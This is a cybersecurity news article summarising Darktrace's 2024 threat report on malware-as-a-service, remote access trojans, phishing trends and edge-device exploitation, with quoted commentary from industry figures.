Cybercrime-as-a-Service (CaaS) is more than just a trend—it’s here to stay. As sophisticated attack tools become widely (and easily) available, even less experienced cybercriminals can now carry out highly disruptive campaigns.
In fact, Malware-as-a-Service (MaaS) now makes up 57% of detected threats—a 17% increase from the first half of last nyear. This surge makes it clear that CaaS models, particularly Ransomware-as-a-Service (RaaS) and MaaS, continue to fuel cybercrime at scale, arming adversaries with the tools they need to launch more frequent and complex attacks with minimal effort.
This was one of the findings of Darktrace’s 2024 Annual Threat Report, which provides insights observed by its Threat Research team using its Self-Learning AI across its customer fleet of nearly 10,000, spanning all major industries globally.
A RAT Infestation
Darktrace researchers also observed a dramatic increase in Remote Access Trojans (RATs).
RATs were detected in 46% of malicious campaigns in the latter half of 2024, up from just 12% in the first half. These tools allow malefactors to remotely control infected devices, facilitating data exfiltration, credential theft, and surveillance.
Researchers also tracked ransomware campaigns using emerging and re-emerging strains, including Lynx, Akira, RansomHub, Black Basta, Fog, and Qilin.
Hook, Line, and Sinker
Phishing remains the top attack vector, with a whopping 30.4 million phishing emails detected across Darktrace’s customer fleet in 2024.
Malicious actors are honing their tactics, harnessing AI-generated text, social engineering, and trusted third-party services to fly under the radar. Key findings from the report include:
- 38% of phishing attacks were spear-phishing campaigns targeting high-value individuals.
- 32% used novel AI-generated text, incorporating complex linguistic patterns to appear more credible.
- 70% of phishing attempts successfully bypassed DMARC authentication.
- 55% evaded traditional security layers before detection.
- Over 940,000 malicious QR codes were identified in phishing attacks.
More and more attackers are eyeing third-party platforms such as Zoom Docs, QuickBooks, HelloSign, Adobe, and Microsoft SharePoint to distribute phishing emails. By using trusted domains, they improve their success rates while circumventing conventional security controls.
Hiding in Plain Sight
Rather than causing immediate disruption, cybercriminals are prioritizing stealth and persistence. The report highlights a surge in edge device vulnerabilities and Living-off-the-Land (LOTL) techniques, which involve the use of legitimate system tools for malicious activity.
Key trends include:
- 40% of campaign activity in early 2024 targeted internet-facing devices, exploiting vulnerabilities in Ivanti Connect Secure, Ivanti Policy Secure, Palo Alto Networks PAN-OS firewalls, and Fortinet appliances.
- Darktrace detected anomalous activity on Palo Alto firewalls 17 days before public disclosure of PAN-OS exploitation on 12 April 2024.
- Attackers increasingly used stolen credentials to gain initial access to remote network solutions such as VPNs.
These tactics make detection tricky for traditional security tools, which battle to separate the wheat from the chaff and distinguish between legitimate administrative activity and malicious use.
By leveraging built-in system tools, cybercrooks limit their reliance on custom malware that might trigger detection once indicators of compromise (IoCs) become public.
Core Enablers of Crime
Jason Soroko, Senior Fellow at Sectigo, says MaaS and CaaS are no longer niche tools—they have become core enablers of an evolving threat landscape. “Malware now drives over half of all attacks, and threat actors don’t just breach defenses, they live off them, using trusted platforms and overlooked vulnerabilities to evade detection. The numbers leave no room for complacency because identity remains an expensive, unresolved liability.”
Email phishing, once a simple tactic, Soroko says, now employs sophisticated, automated techniques that outwit conventional security. “Attackers exploit edge devices and SaaS credentials with precision, blending malicious activity into normal operations. The bad guys have taught us that identity is at the center of their success and we have largely failed to put stronger locks on the doors with better forms of authentication.”
It’s Not Just About Causing Chaos
The rise of CaaS is changing the game, making it easier for malefactors to carry out sophisticated threats across multiple channels, adds J Stephen Kowski, Field CTO at SlashNext. “Phishing is no longer limited to email and often uses cloud app abuse techniques leveraging OneDrive, DocuSign, and Dropbox. Attacks now flow through Teams, Slack, LinkedIn messages, and mobile channels, creating a broader threat surface.
“It’s not just about causing chaos anymore; attackers are getting better at sneaking around using trusted tools and exploiting vulnerabilities in everyday devices to stay hidden,” Kowski explains.
Modern security requires real-time detection and prevention that works across every communication channel, particularly since conventional tools battle to keep pace with these evolving attack patterns.
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.